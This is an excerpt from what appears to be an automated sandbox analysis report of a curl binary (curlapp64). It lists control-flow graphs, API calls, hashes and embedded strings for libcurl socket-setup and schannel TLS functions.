                                                                                                                                control_flow_graph 630 7ff8a93079f0-7ff8a9307a53 call 7ff8a9353b60 call 7ff8a9308230 635 7ff8a9307ac6-7ff8a9307acd 630->635 636 7ff8a9307a55-7ff8a9307a75 call 7ff8a930c990 630->636 637 7ff8a9307acf-7ff8a9307ae1 call 7ff8a9308110 635->637 638 7ff8a9307ae8-7ff8a9307b2d call 7ff8a9314bb0 call 7ff8a9369e10 635->638 645 7ff8a9307b2e-7ff8a9307b35 636->645 646 7ff8a9307a7b-7ff8a9307ac1 _errno * 3 call 7ff8a934ec40 call 7ff8a9314a70 636->646 637->638 648 7ff8a9307b37-7ff8a9307b63 setsockopt 645->648 649 7ff8a9307b65 645->649 646->635 652 7ff8a9307b6c-7ff8a9307b89 call 7ff8a9314b60 648->652 649->652 658 7ff8a9307b90-7ff8a9307b95 652->658 659 7ff8a9307b8b-7ff8a9307b8e 652->659 660 7ff8a9307bfb 658->660 661 7ff8a9307b97-7ff8a9307ba0 658->661 659->658 659->660 663 7ff8a9307bfe-7ff8a9307c21 660->663 662 7ff8a9307ba2-7ff8a9307bcd setsockopt 661->662 661->663 662->663 664 7ff8a9307bcf-7ff8a9307bf9 WSAGetLastError call 7ff8a934ec40 call 7ff8a9314b60 662->664 665 7ff8a9307c23-7ff8a9307c42 call 7ff8a935c700 663->665 666 7ff8a9307c5c-7ff8a9307c5f 663->666 664->663 681 7ff8a9307c44-7ff8a9307c4e 665->681 682 7ff8a9307c50-7ff8a9307c5a 665->682 667 7ff8a9307cb3-7ff8a9307cb6 666->667 668 7ff8a9307c61-7ff8a9307c86 getsockopt 666->668 673 7ff8a9307cbc-7ff8a9307cc3 667->673 674 7ff8a9307df8-7ff8a9307e00 667->674 671 7ff8a9307c92-7ff8a9307cad setsockopt 668->671 672 7ff8a9307c88-7ff8a9307c90 668->672 671->667 672->667 672->671 673->674 677 7ff8a9307cc9-7ff8a9307cf7 setsockopt 673->677 679 7ff8a9307e43 674->679 680 7ff8a9307e02-7ff8a9307e2e call 7ff8a9338350 * 2 674->680 684 7ff8a9307d0b-7ff8a9307d3d call 7ff8a935c970 setsockopt 677->684 685 7ff8a9307cf9-7ff8a9307d06 WSAGetLastError 677->685 683 7ff8a9307e46-7ff8a9307e4d 679->683 716 7ff8a9307e35-7ff8a9307e37 680->716 717 7ff8a9307e30-7ff8a9307e33 680->717 681->667 682->668 688 7ff8a9307e54-7ff8a9307e78 call 7ff8a932ec50 call 7ff8a9307410 683->688 689 7ff8a9307e4f-7ff8a9307e52 683->689 698 7ff8a9307d3f-7ff8a9307d55 WSAGetLastError call 7ff8a9314b60 684->698 699 7ff8a9307d5a-7ff8a9307d8c call 7ff8a935c970 setsockopt 684->699 690 7ff8a9307dea-7ff8a9307df3 call 7ff8a9314b60 685->690 693 7ff8a9307e8d-7ff8a9307e95 call 7ff8a933c2d0 688->693 713 7ff8a9307e7a-7ff8a9307e7d 688->713 689->688 689->693 690->674 706 7ff8a9307e9a-7ff8a9307e9c 693->706 698->699 714 7ff8a9307d8e-7ff8a9307da4 WSAGetLastError call 7ff8a9314b60 699->714 715 7ff8a9307da9-7ff8a9307ddb call 7ff8a935c970 setsockopt 699->715 710 7ff8a9307eb5-7ff8a9307ec6 706->710 711 7ff8a9307e9e-7ff8a9307eb0 WSAGetLastError 706->711 710->635 712 7ff8a9307ecc-7ff8a9307ecf 710->712 711->635 712->638 720 7ff8a9307ed5-7ff8a9307efa call 7ff8a9307f90 call 7ff8a9353b60 712->720 713->635 722 7ff8a9307e83-7ff8a9307e88 713->722 714->715 715->674 726 7ff8a9307ddd-7ff8a9307de3 WSAGetLastError 715->726 716->679 719 7ff8a9307e39-7ff8a9307e3e 716->719 717->683 719->635 720->638 722->635 726->690
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$setsockopt$_errno$CountCounterPerformanceQueryTickgetsocknamegetsockopthtonsinet_ntop
                                                                                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                • API String ID: 1107047317-1591695899
                                                                                                                                • Opcode ID: af233c28879aeda71a7e76b14a13bfb3ca36edd483e8f51a29c66516736225a1
                                                                                                                                • Instruction ID: 233b4c5fe284f054c146818f1a89e358fd5a8d072f4c0465f7aa9b065c54051f
                                                                                                                                • Opcode Fuzzy Hash: af233c28879aeda71a7e76b14a13bfb3ca36edd483e8f51a29c66516736225a1
                                                                                                                                • Instruction Fuzzy Hash: 04D18A31A0EAC2A6EB20CF65D8447BA67B0FB85BC4F506135EA4E87691DF3DE545CB00
                                                                                                                                Function 00007FF8A935F4F0 Relevance: 37.1, APIs: 6, Strings: 15, Instructions: 334COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 931 7ff8a935f4f0-7ff8a935f54e 932 7ff8a935f56a-7ff8a935f56f 931->932 933 7ff8a935f550-7ff8a935f554 931->933 935 7ff8a935f581-7ff8a935f585 932->935 936 7ff8a935f571-7ff8a935f57c 932->936 933->932 934 7ff8a935f556-7ff8a935f565 call 7ff8a9314b60 933->934 948 7ff8a935f8b1-7ff8a935f8b6 934->948 939 7ff8a935f587-7ff8a935f58e 935->939 940 7ff8a935f593-7ff8a935f596 935->940 938 7ff8a935f8a0 936->938 941 7ff8a935f8a3 call 7ff8a9314b60 938->941 939->938 943 7ff8a935f59c-7ff8a935f5a0 940->943 944 7ff8a935f680-7ff8a935f687 940->944 947 7ff8a935f8a8-7ff8a935f8ab 941->947 943->944 949 7ff8a935f5a6-7ff8a935f5bb 943->949 946 7ff8a935f68d-7ff8a935f68f 944->946 944->947 946->947 954 7ff8a935f695-7ff8a935f698 946->954 947->948 952 7ff8a935f9a8-7ff8a935f9ae 947->952 948->952 953 7ff8a935f8bc-7ff8a935f8c0 948->953 950 7ff8a935f5bd-7ff8a935f5c0 949->950 951 7ff8a935f5c2-7ff8a935f5e0 realloc 949->951 950->951 955 7ff8a935f60d-7ff8a935f628 call 7ff8a9308c40 950->955 956 7ff8a935f5fe-7ff8a935f609 951->956 957 7ff8a935f5e2-7ff8a935f5f9 call 7ff8a9314a70 951->957 961 7ff8a935f9b8-7ff8a935f9c6 952->961 962 7ff8a935f9b0-7ff8a935f9b3 952->962 953->952 958 7ff8a935f8c6-7ff8a935f8ca 953->958 959 7ff8a935f6aa-7ff8a935f720 call 7ff8a935c9b0 954->959 960 7ff8a935f69a-7ff8a935f69e 954->960 975 7ff8a935f62d-7ff8a935f634 955->975 956->955 957->948 958->952 967 7ff8a935f8d0-7ff8a935f8ef call 7ff8a935c700 958->967 993 7ff8a935f734-7ff8a935f739 959->993 994 7ff8a935f722-7ff8a935f727 959->994 960->959 968 7ff8a935f6a0-7ff8a935f6a4 960->968 963 7ff8a935f9fe-7ff8a935fa04 961->963 964 7ff8a935f9c8-7ff8a935f9fc memmove * 2 961->964 962->961 970 7ff8a935f9b5 962->970 972 7ff8a935fa18-7ff8a935fa1b 963->972 973 7ff8a935fa06-7ff8a935fa09 963->973 971 7ff8a935fa28-7ff8a935fa4a call 7ff8a9369e10 964->971 990 7ff8a935f8f5-7ff8a935f8f7 967->990 991 7ff8a935f991-7ff8a935f9a3 call 7ff8a9314b60 967->991 968->947 968->959 970->961 979 7ff8a935fa1d-7ff8a935fa21 972->979 980 7ff8a935fa23-7ff8a935fa25 972->980 973->972 978 7ff8a935fa0b-7ff8a935fa13 973->978 982 7ff8a935f636-7ff8a935f63a 975->982 983 7ff8a935f661-7ff8a935f664 975->983 978->972 979->980 980->971 988 7ff8a935f63c-7ff8a935f643 982->988 989 7ff8a935f676-7ff8a935f678 982->989 985 7ff8a935f66c 983->985 986 7ff8a935f666-7ff8a935f66a 983->986 985->989 995 7ff8a935f66e-7ff8a935f672 985->995 986->989 996 7ff8a935f645-7ff8a935f651 call 7ff8a9314b60 988->996 997 7ff8a935f653-7ff8a935f65f call 7ff8a9314b60 988->997 989->944 990->991 998 7ff8a935f8fd-7ff8a935f901 990->998 991->952 1001 7ff8a935f73b-7ff8a935f75d 993->1001 1002 7ff8a935f7b2-7ff8a935f7b6 993->1002 994->993 1000 7ff8a935f729-7ff8a935f72e 994->1000 995->989 996->989 997->989 998->952 1000->993 1006 7ff8a935f906-7ff8a935f90c 1000->1006 1007 7ff8a935f75f-7ff8a935f762 1001->1007 1008 7ff8a935f764-7ff8a935f77f realloc 1001->1008 1009 7ff8a935f7b8-7ff8a935f7bd 1002->1009 1010 7ff8a935f7e6 1002->1010 1016 7ff8a935f92d-7ff8a935f958 call 7ff8a934e4c0 call 7ff8a9314b60 1006->1016 1017 7ff8a935f90e-7ff8a935f917 1006->1017 1007->1008 1012 7ff8a935f791-7ff8a935f795 1007->1012 1013 7ff8a935f95d-7ff8a935f974 call 7ff8a9314a70 1008->1013 1014 7ff8a935f785-7ff8a935f78d 1008->1014 1009->1010 1015 7ff8a935f7bf-7ff8a935f7c9 1009->1015 1018 7ff8a935f7ea-7ff8a935f7f0 1010->1018 1023 7ff8a935f797-7ff8a935f7ac memmove 1012->1023 1024 7ff8a935f7b0 1012->1024 1013->947 1014->1012 1015->1018 1025 7ff8a935f7cb-7ff8a935f7e4 memmove 1015->1025 1016->947 1026 7ff8a935f919 1017->1026 1027 7ff8a935f921-7ff8a935f928 1017->1027 1019 7ff8a935f87f-7ff8a935f885 1018->1019 1020 7ff8a935f7f6-7ff8a935f80b call 7ff8a9314b60 1018->1020 1019->944 1031 7ff8a935f88b-7ff8a935f893 1019->1031 1036 7ff8a935f80d-7ff8a935f810 1020->1036 1037 7ff8a935f816-7ff8a935f866 call 7ff8a9314b60 call 7ff8a9361420 1020->1037 1023->1024 1024->1002 1025->1018 1026->1027 1027->938 1034 7ff8a935f899 1031->1034 1035 7ff8a935f895 1031->1035 1034->938 1035->1034 1036->1037 1039 7ff8a935f979-7ff8a935f980 1036->1039 1044 7ff8a935f86c-7ff8a935f87a call 7ff8a9314b60 1037->1044 1045 7ff8a935f985-7ff8a935f98c 1037->1045 1039->938 1044->944 1045->941
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove
                                                                                                                                • String ID: schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: cannot renegotiate, an error is pending$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: recv returned CURLE_RECV_ERROR$schannel: recv returned error %d$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server close notification received (close_notify)$schannel: server closed abruptly (missing close_notify)$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                                                                                • API String ID: 2162964266-1798541782
                                                                                                                                • Opcode ID: 0e4d680b9640eff7589c3bcc1cb57fad1f548155597456c9b766163047e7b5dd
                                                                                                                                • Instruction ID: 7397bb7877c5db2e3fb9075afb5221ae361ade0b4774628bc446f8183e917064
                                                                                                                                • Opcode Fuzzy Hash: 0e4d680b9640eff7589c3bcc1cb57fad1f548155597456c9b766163047e7b5dd
                                                                                                                                • Instruction Fuzzy Hash: DDE16962A0EBA2A9EB60DF25D54436D37B1EB48BC8F507035DA4D87698DF78E880C740
                                                                                                                                Function 00007FF8A9361A60 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 367encryptionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1217 7ff8a9361a60-7ff8a9361abb call 7ff8a9364a40 1220 7ff8a936209d 1217->1220 1221 7ff8a9361ac1-7ff8a9361ac6 1217->1221 1221->1220 1222 7ff8a9361acc-7ff8a9361ae1 1221->1222 1223 7ff8a9361b0b-7ff8a9361b12 1222->1223 1224 7ff8a9361ae3-7ff8a9361b05 malloc 1222->1224 1226 7ff8a9361b3e-7ff8a9361b4f 1223->1226 1227 7ff8a9361b14-7ff8a9361b38 malloc 1223->1227 1224->1223 1225 7ff8a9362091 1224->1225 1225->1220 1228 7ff8a9361b51-7ff8a9361b64 realloc 1226->1228 1229 7ff8a9361bb2-7ff8a9361bb4 1226->1229 1227->1225 1227->1226 1230 7ff8a9361baa-7ff8a9361bae 1228->1230 1231 7ff8a9361b66-7ff8a9361ba9 call 7ff8a9314a70 call 7ff8a9369e10 1228->1231 1232 7ff8a9361bb6-7ff8a9361bd7 call 7ff8a9308c40 1229->1232 1233 7ff8a9361c01-7ff8a9361c98 call 7ff8a935c9b0 malloc 1229->1233 1230->1229 1238 7ff8a9361bdc-7ff8a9361be3 1232->1238 1233->1225 1240 7ff8a9361c9e-7ff8a9361d19 memmove free 1233->1240 1242 7ff8a9361be9-7ff8a9361beb 1238->1242 1243 7ff8a9362081 1238->1243 1251 7ff8a936207d 1240->1251 1252 7ff8a9361d1f-7ff8a9361d26 1240->1252 1245 7ff8a9361bf1-7ff8a9361bf4 1242->1245 1246 7ff8a9361de2-7ff8a9361df1 call 7ff8a9314a70 1242->1246 1247 7ff8a936208a 1243->1247 1245->1246 1250 7ff8a9361bfa-7ff8a9361bfe 1245->1250 1260 7ff8a9361dfb-7ff8a9361e1b call 7ff8a9314a70 1246->1260 1247->1225 1250->1233 1251->1243 1254 7ff8a9361d2c-7ff8a9361d33 1252->1254 1255 7ff8a9361fd2-7ff8a9361fd7 1252->1255 1258 7ff8a9361d3e-7ff8a9361d40 1254->1258 1259 7ff8a9361d35-7ff8a9361d38 1254->1259 1256 7ff8a9361fdd-7ff8a9361fed call 7ff8a934e4c0 1255->1256 1257 7ff8a9362066-7ff8a936206f 1255->1257 1264 7ff8a9361ff2-7ff8a9361fff 1256->1264 1257->1251 1262 7ff8a9361d47-7ff8a9361d4b 1258->1262 1259->1256 1259->1258 1278 7ff8a9361e25 1260->1278 1265 7ff8a9361d4d-7ff8a9361d51 1262->1265 1266 7ff8a9361d83-7ff8a9361d8a 1262->1266 1268 7ff8a9362055-7ff8a9362061 call 7ff8a9314a70 1264->1268 1269 7ff8a9362001-7ff8a9362008 1264->1269 1265->1266 1270 7ff8a9361d53-7ff8a9361d70 call 7ff8a9308c60 1265->1270 1271 7ff8a9361d8c 1266->1271 1272 7ff8a9361d99-7ff8a9361da2 1266->1272 1268->1257 1275 7ff8a936203f-7ff8a936204b call 7ff8a9314a70 1269->1275 1276 7ff8a936200a-7ff8a9362011 1269->1276 1284 7ff8a9361d75-7ff8a9361d7a 1270->1284 1271->1272 1272->1262 1273 7ff8a9361da4-7ff8a9361da8 1272->1273 1273->1278 1279 7ff8a9361daa-7ff8a9361daf 1273->1279 1275->1268 1282 7ff8a9362029-7ff8a9362035 call 7ff8a9314a70 1276->1282 1283 7ff8a9362013-7ff8a936201f call 7ff8a9314a70 1276->1283 1285 7ff8a9361e2d-7ff8a9361e34 1278->1285 1279->1278 1287 7ff8a9361db1-7ff8a9361dbb 1279->1287 1282->1275 1283->1282 1284->1260 1290 7ff8a9361d7c-7ff8a9361d81 1284->1290 1285->1243 1286 7ff8a9361e3a-7ff8a9361e3d 1285->1286 1292 7ff8a9361e3f 1286->1292 1293 7ff8a9361e48-7ff8a9361e52 call 7ff8a9364a60 1286->1293 1287->1285 1294 7ff8a9361dbd-7ff8a9361dda memmove 1287->1294 1290->1260 1290->1266 1292->1293 1300 7ff8a9361e5d 1293->1300 1301 7ff8a9361e54-7ff8a9361e5b 1293->1301 1294->1233 1298 7ff8a9361de0 1294->1298 1298->1286 1302 7ff8a9361e64-7ff8a9361e67 1300->1302 1301->1302 1303 7ff8a9361e6d-7ff8a9361e9d 1302->1303 1304 7ff8a9361f94-7ff8a9361f9c 1302->1304 1311 7ff8a9361f3e-7ff8a9361f5f call 7ff8a934e4c0 call 7ff8a9314a70 1303->1311 1312 7ff8a9361ea3-7ff8a9361eab 1303->1312 1305 7ff8a9361f9e-7ff8a9361fa2 1304->1305 1306 7ff8a9361fb8-7ff8a9361fbc 1304->1306 1305->1247 1308 7ff8a9361fa8-7ff8a9361fb3 call 7ff8a9362470 1305->1308 1306->1247 1309 7ff8a9361fc2-7ff8a9361fcd call 7ff8a93628a0 1306->1309 1308->1306 1309->1255 1325 7ff8a9361f64 1311->1325 1312->1311 1315 7ff8a9361eb1-7ff8a9361eb4 1312->1315 1318 7ff8a9361f69-7ff8a9361f6c 1315->1318 1319 7ff8a9361eba-7ff8a9361ec1 1315->1319 1321 7ff8a9361f6e CertFreeCertificateContext 1318->1321 1322 7ff8a9361f74-7ff8a9361f7a 1318->1322 1319->1318 1323 7ff8a9361ec7-7ff8a9361eee memset call 7ff8a9367ff0 1319->1323 1321->1322 1322->1304 1326 7ff8a9361f7c-7ff8a9361f8b call 7ff8a9314a70 1322->1326 1323->1325 1330 7ff8a9361ef0-7ff8a9361efa 1323->1330 1325->1318 1326->1304 1332 7ff8a9361f2d-7ff8a9361f3c call 7ff8a9314a70 1330->1332 1333 7ff8a9361efc-7ff8a9361f06 1330->1333 1332->1325 1333->1332 1334 7ff8a9361f08-7ff8a9361f1a call 7ff8a9364560 1333->1334 1334->1325 1339 7ff8a9361f1c-7ff8a9361f2b call 7ff8a9314a70 1334->1339 1339->1325
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                                                                                • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                                                                                • API String ID: 726578228-413892695
                                                                                                                                • Opcode ID: 1c89735346aaf1001f2f75494c99134df3d8826fe6c35ffc47ab6bf60cf2c876
                                                                                                                                • Instruction ID: 0348c140f88983548cf857580136cfe291098b7fa62c3c7e2b723827458f8429
                                                                                                                                • Opcode Fuzzy Hash: 1c89735346aaf1001f2f75494c99134df3d8826fe6c35ffc47ab6bf60cf2c876
                                                                                                                                • Instruction Fuzzy Hash: 86023B62A0EAC2AAEB608F65E4943AAA7B0FB447C4F546035DB4E87795DF7CE540C700
                                                                                                                                Function 00007FF8A934E4C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 118COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1518 7ff8a934e4c0-7ff8a934e4fe GetLastError _errno 1519 7ff8a934e507-7ff8a934e518 1518->1519 1520 7ff8a934e500-7ff8a934e502 1518->1520 1521 7ff8a934e8bc-7ff8a934e8c2 1519->1521 1522 7ff8a934e51e 1519->1522 1523 7ff8a934ea2e-7ff8a934ea4c call 7ff8a9369e10 1520->1523 1527 7ff8a934e8c4 1521->1527 1528 7ff8a934e936-7ff8a934e93f 1521->1528 1524 7ff8a934e524-7ff8a934e52d 1522->1524 1525 7ff8a934e8b0-7ff8a934e8b7 1522->1525 1529 7ff8a934e9be-7ff8a934e9cb 1524->1529 1530 7ff8a934e533-7ff8a934e543 1524->1530 1533 7ff8a934e54f-7ff8a934e55c call 7ff8a934f5b0 1525->1533 1534 7ff8a934e92a-7ff8a934e931 1527->1534 1535 7ff8a934e8c6-7ff8a934e8cc 1527->1535 1528->1529 1532 7ff8a934e941-7ff8a934e959 1528->1532 1529->1533 1537 7ff8a934e9d1-7ff8a934e9e9 call 7ff8a9334eb0 1529->1537 1530->1533 1532->1529 1540 7ff8a934e561-7ff8a934e56d 1533->1540 1534->1533 1538 7ff8a934e91e-7ff8a934e925 1535->1538 1539 7ff8a934e8ce-7ff8a934e8d4 1535->1539 1553 7ff8a934e9fb-7ff8a934ea0c _errno 1537->1553 1538->1533 1542 7ff8a934e8d6-7ff8a934e8dc 1539->1542 1543 7ff8a934e912-7ff8a934e919 1539->1543 1546 7ff8a934e9eb-7ff8a934e9f6 call 7ff8a9334eb0 1540->1546 1547 7ff8a934e573-7ff8a934e58d call 7ff8a9334eb0 1540->1547 1544 7ff8a934e8de-7ff8a934e8e4 1542->1544 1545 7ff8a934e906-7ff8a934e90d 1542->1545 1543->1533 1550 7ff8a934e8fa-7ff8a934e901 1544->1550 1551 7ff8a934e8e6-7ff8a934e8e8 1544->1551 1545->1533 1546->1553 1547->1553 1550->1533 1551->1529 1554 7ff8a934e8ee-7ff8a934e8f5 1551->1554 1555 7ff8a934ea0e-7ff8a934ea14 _errno 1553->1555 1556 7ff8a934ea17-7ff8a934ea20 GetLastError 1553->1556 1554->1533 1555->1556 1558 7ff8a934ea2b 1556->1558 1559 7ff8a934ea22-7ff8a934ea25 SetLastError 1556->1559 1558->1523 1559->1558
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                                                                                • API String ID: 3939687465-2168394622
                                                                                                                                • Opcode ID: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                • Instruction ID: f32199e0e85254b7fda0afe037812960053f3bcca5ea19c945da62675a922652
                                                                                                                                • Opcode Fuzzy Hash: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                • Instruction Fuzzy Hash: 85519D22A0EDC3B5FA748F05A8842B962B2FF847C5F8A7031D90E82291EF3CF555D215
                                                                                                                                Function 00007FF8A9302A50 Relevance: 28.7, APIs: 19, Instructions: 169COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1560 7ff8a9302a50-7ff8a9302a9b calloc 1561 7ff8a9302bf4-7ff8a9302bfd _errno 1560->1561 1562 7ff8a9302aa1-7ff8a9302b20 malloc 1560->1562 1563 7ff8a9302bff-7ff8a9302c1b 1561->1563 1564 7ff8a9302b63-7ff8a9302b6b 1562->1564 1565 7ff8a9302b22-7ff8a9302b4d InitializeCriticalSectionEx call 7ff8a934b3f0 1562->1565 1567 7ff8a9302b6d-7ff8a9302b73 closesocket 1564->1567 1568 7ff8a9302b7b-7ff8a9302b82 1564->1568 1572 7ff8a9302b53-7ff8a9302b5b 1565->1572 1573 7ff8a9302c1c-7ff8a9302c30 _strdup 1565->1573 1567->1568 1570 7ff8a9302b94-7ff8a9302ba5 free 1568->1570 1571 7ff8a9302b84-7ff8a9302b8e DeleteCriticalSection free 1568->1571 1574 7ff8a9302ba7 call 7ff8a93116c0 1570->1574 1575 7ff8a9302bac-7ff8a9302bb4 1570->1575 1571->1570 1572->1564 1573->1564 1576 7ff8a9302c36-7ff8a9302c56 free _strdup 1573->1576 1574->1575 1578 7ff8a9302bb6 closesocket 1575->1578 1579 7ff8a9302bbc-7ff8a9302bee free 1575->1579 1580 7ff8a9302c84-7ff8a9302c8e 1576->1580 1581 7ff8a9302c58-7ff8a9302c67 call 7ff8a93148e0 1576->1581 1578->1579 1579->1561 1583 7ff8a9302d02-7ff8a9302d1d free 1580->1583 1584 7ff8a9302c90-7ff8a9302cb8 EnterCriticalSection LeaveCriticalSection 1580->1584 1585 7ff8a9302c6c-7ff8a9302c72 1581->1585 1583->1561 1586 7ff8a9302ccb-7ff8a9302cce 1584->1586 1587 7ff8a9302cba-7ff8a9302cc2 call 7ff8a9314920 1584->1587 1590 7ff8a9302cc4-7ff8a9302cc6 1585->1590 1591 7ff8a9302c74-7ff8a9302c81 _errno 1585->1591 1588 7ff8a9302cd0-7ff8a9302cd3 call 7ff8a9314930 1586->1588 1589 7ff8a9302cd8-7ff8a9302ce8 call 7ff8a93028c0 free 1586->1589 1597 7ff8a9302cee-7ff8a9302cfc call 7ff8a93378b0 closesocket 1587->1597 1588->1589 1589->1597 1590->1563 1591->1580 1597->1583
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
